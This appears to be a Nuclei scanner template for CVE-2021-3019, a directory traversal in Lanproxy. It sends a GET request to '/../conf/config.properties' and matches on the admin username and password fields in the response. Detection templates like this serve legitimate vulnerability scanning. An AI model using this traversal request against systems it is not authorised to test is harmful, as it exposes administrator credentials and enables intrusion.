id: CVE-2021-3019 info: name: Lanproxy Directory Traversal author: pikpikcu severity: medium reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019 tags: cve,cve2021,lanproxy,traversal requests: - method: GET path: - "{{BaseURL}}/../conf/config.properties" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "application/octet-stream" condition: and part: header - type: word words: - "config.admin.username" - "config.admin.password" condition: and part: body